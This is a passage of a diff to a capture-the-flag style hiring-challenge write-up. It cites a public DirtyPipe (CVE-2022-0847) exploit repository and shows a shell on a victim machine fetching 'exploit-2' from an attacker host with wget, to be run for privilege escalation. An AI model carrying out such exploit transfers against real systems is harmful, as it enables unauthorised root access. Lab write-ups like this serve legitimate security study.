Aftab700/Writeups/Saptang_Labs_Hiring_Challenge.md

 reference: https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits

-we follow the steps in GitHub repo and we have `exploit-1`, `exploit-2`. transfer this to victim machine and run this.
+we follow the steps in GitHub repo and we have `exploit-1`, `exploit-2`. transfer this to victim machine and run.

 ```Shell
 www-data@heathrow-VirtualBox:/tmp$ wget 192.168.1.12/exploit-2